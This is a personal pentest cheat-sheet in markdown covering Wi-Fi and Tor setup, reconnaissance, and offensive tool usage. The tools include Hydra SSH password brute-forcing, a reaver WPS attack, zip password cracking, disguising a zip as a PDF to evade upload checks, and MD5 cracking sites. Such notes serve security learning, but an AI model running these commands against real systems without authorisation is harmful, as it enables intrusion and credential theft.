pentest.md


Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • :TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# List wireless interfaces (iw is the nl80211-based successor of iwconfig);
# the interface name (wlp1s0 below) comes from this output.
# list of devices
iw dev

# Replace the MAC address of wlp1s0 with a random one. The interface is taken
# down first because macchanger rewrites the address on a downed link.
# sudo apt-get install macchanger
macchanger -s wlp1s0            # -s: show the current and the permanent MAC
sudo ifconfig wlp1s0 down       # legacy net-tools; the commented `ip link` line is the iproute2 equivalent
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0       # -r: assign a fully random MAC
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0            # confirm the change took effect

list of all accessible wifi points

# NetworkManager's view of nearby access points. NB: this section uses wlan0
# while the macchanger section above uses wlp1s0 — substitute your interface.
# force rescan 
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields 
nmcli -f ALL device wifi
# all fields, in machine-readable form for scripts:
# -t is terse colon-separated output, -m multiline prints one field per line
nmcli -t -f ALL device wifi
nmcli -m multiline  -f ALL device wifi

# alternative way (iwlist belongs to the legacy wireless-tools package)
iwlist wlan0 scan 

# alternative way (nl80211; triggering a scan normally needs root)
iw wlan0 scan

# alternative way: wavemon is an interactive signal/AP monitor — this line only
# installs it, run `wavemon` afterwards
sudo apt install wavemon

connect to selected network

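# install tool
apt-get install wireless-tools wpasupplicant
# save password: wpa_passphrase reads the passphrase from stdin and prints a
# network={...} block. That output also carries the cleartext passphrase in a
# `#psk="..."` comment line, so it is stripped before anything lands on disk;
# the write goes through `sudo tee -a` because a plain `>>` redirect runs as the
# unprivileged user and fails on /etc; the file is then made root-only readable
# because the hashed PSK it keeps is still a credential.
wpa_passphrase YourSSID | sed '/^[[:space:]]*#psk=/d' | sudo tee -a /etc/wpa_supplicant.conf >/dev/null
sudo chmod 600 /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to network: -D wext (driver backend), -i wlan0 (interface),
# -B (run in the background), -c (the config file written above).
# wext is the legacy ioctl backend; if it fails on a current kernel, -D nl80211
# is the usual replacement.
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant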

check your current IP address

  • check ip address via proxy
# Through the local privoxy listener on 8118; once the tor section below is in
# place this shows the exit node's address rather than your own.
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
# Screen-scrapes getfoxyproxy's HTML for the IP and location. -X GET is the
# default and can be dropped. Scraping breaks whenever the markup changes; the
# ipify JSON endpoint below is the stable choice for scripts.
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
# No proxy: plain-text address, then the JSON form ({"ip": "..."}) for scripting.
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'

activate tor connection

  • installation
# installation: tor exposes a SOCKS listener on 9050; privoxy fronts it with an
# HTTP proxy on 8118 so clients that only speak http(s)_proxy (curl --proxy)
# can use the chain.
sudo apt install tor
sudo apt install privoxy
  • configuration sudo vim /etc/privoxy/config
# Both rules send every destination ("/") to tor's SOCKS port. socks5t is the
# Tor-specific SOCKS5 variant; socks4a is the older protocol. In both, name
# resolution happens on the tor side, so no DNS lookups leak locally.
# NOTE(review): two rules with the same pattern are redundant and presumably the
# later one wins — keep only socks5t unless the socks4a line is wanted as a
# fallback; verify precedence against the privoxy documentation.
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# privoxy only reads the forward-socks rule edited above on (re)start
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards
# via TOR 
# via TOR (privoxy on 8118 forwards to tor on 9050)
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect — the two answers must differ; if they match, the chain is not in use
curl 'https://api.ipify.org'
  • stop: stop tor, then stop privoxy
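# Stopping the units needs privileges, like the `sudo service ... restart` lines
# above; without sudo the stop is refused or triggers a polkit prompt. The
# status calls confirm the units are down and work as a plain user.
sudo systemctl stop tor
systemctl status tor

sudo systemctl stop privoxy
systemctl status privoxy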

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Remote host analyzing

whois cli console whois

# apt install whois
# Registration data for the domain (registrar, name servers, contacts). whois
# also accepts an IP address, which queries the RIR databases instead.
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {host name}

cms detector ContentManagementSystem detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

[find cms](2ip.ru/cms)

/robots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login

Request information

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

# Flags in the examples: -l/-p a single login/password, -L/-P files of
# candidates, -o the log file. Every candidate is a real login attempt, so the
# second line produces a burst of failed ssh authentications from one source
# address — the signature that account lockout, rate limiting and
# fail2ban-style log monitoring exist to catch.
hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log

GSM

phone info

HLR request

sms

sms receive sms receive

e-mail

just create login & password

to change the address manually: Cookies -> https://temp-mail.org -> email

after one day it is no longer possible to recover the email address

files

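# Pack the folder, then give the archive a .pdf name. Renaming changes nothing
# inside the file — a zip still starts with its "PK" signature — and the vim step
# is presumably where the header is edited so the file begins with "%PDF-1.5"
# (that is what the trailing comment suggests). Upload or hosting checks that
# look only at the extension or the first bytes do not notice; content
# inspection (e.g. a zip central-directory signature at the end of the file) or
# unpacking in a sandbox does.
zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
# The URL is quoted: `?` is a glob character, and an unquoted URL is a shell
# expansion waiting to happen. -F name=... -F file=@... sends a multipart form;
# -i keeps the response headers in the output.
curl -i -F name=some-archive.pdf -F file=@archive.pdf 'https://uguu.se/api.php?d=upload' | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf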

archive

open zip with brute force zip

# sudo apt install fcrackzip
# --brute-force over passwords of 1-20 characters; --use-unzip verifies each
# candidate by actually unpacking with unzip, which weeds out false positives
# from the archive's own cheap password check.
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
# same with short flags (-v verbose, -u use-unzip, -b brute-force), default length
fcrackzip -v -u -b 1.zip

# statistic: 8 chars - 62 days
# fcrackzip only handles the legacy ZipCrypto (PKZIP) scheme; AES-encrypted
# archives (WinZip AES, 7z) are outside its reach. The 62-day figure above is
# what an 8-character password buys against the legacy scheme — long
# passphrases plus AES are the mitigation.

wifi

initiate monitor mode on interface

ifconfig 
# ( result - wlan0 )
# stop the processes that hold the wireless interface (NetworkManager,
# wpa_supplicant, ...) so monitor mode can be enabled; normal connectivity is
# gone until they are started again
airmon-ng check kill
airmon-ng check 
# ( should be empty )
airmon-ng start wlan0 
# ( result - wlan0mon )
# passive capture of nearby access points and the BSSID of each
airodump-ng wlan0mon 
# ( result - BSSID )
# reaver works against the access point's WPS PIN exchange. The exposure exists
# only while WPS is enabled on the AP, so disabling WPS (at least the PIN
# method) is the mitigation on the defending side; APs that lock WPS after a
# few failures also make this noisy and slow.
reaver -i wlan0mon -b <BSSID> -vv -K 1

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/

android

android market

reverse engineering

apk to jar

apk to jar download

unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/

apk to jar use

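# Convert an Android APK (dalvik dex classes) into a jar of JVM classes with
# dex2jar so it can be opened in jd-gui ("jar to java" below). Expansions are
# quoted so an APK name containing spaces or glob characters still works.
APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
# NOTE(review): dex2jar-2.1.zip is unpacked into ~/Downloads in the previous
# section; confirm the directory it creates really is dex-toos-2.1 (dex-tools-2.1
# looks more likely) before running this.
PATH_TO_DEX2JAR=~/Downloads/dex-toos-2.1/d2j-dex2jar.sh

# -f: overwrite the output jar if it already exists
sh "$PATH_TO_DEX2JAR" -f "$PATH_TO_APK"
# result: dex2jar names the output <apk basename>-dex2jar.jar
ls -la "${APK_NAME}-dex2jar.jar"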

jar to java

jar to java download

jar to java tool jar to java tool download

jar to java usage

java -jar jd-gui-1.6.6-min.jar

bitcoin

electrum wallet

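# Electrum from the upstream tarball. pip runs the package's setup code, so a
# URL install is effectively "download and execute": verify the release's
# signature (published alongside the tarball on download.electrum.org) or its
# hash before this step, and keep the version pinned rather than taking
# whatever is newest.
sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
# The URL is quoted: `[fast]` is a glob bracket expression and would be
# subject to pathname expansion if left bare.
pip3 install "https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]"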